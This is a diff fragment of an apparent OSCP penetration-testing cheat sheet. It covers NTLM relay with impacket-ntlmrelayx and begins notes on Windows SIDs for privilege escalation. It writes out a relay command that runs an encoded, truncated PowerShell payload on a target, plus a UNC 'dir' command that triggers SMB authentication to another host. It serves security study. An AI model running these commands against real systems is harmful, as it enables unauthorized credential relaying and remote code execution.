peterkhe1999/CheatSheet/OSCP/README.md

 impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
 ```

-**ntlmrelayx** received an SMB connection and used it to authenticate to our target by relaying it

 ```pwsh
 dir \\192.168.119.2\test
 ```

 # Windows Privilege Escalation

-Windows uses only the **SID** (not usernames) to identify principals for access control management.
+Windows uses only the **SID** to identify principals for access control management.
 - A SID is a unique value assigned to each entity, or principal, that can be authenticated by Windows, such as users and groups.

 - The SID for local accounts and groups is generated by the Local Security Authority (LSA), and for domain users and domain groups, it's generated on a Domain Controller (DC).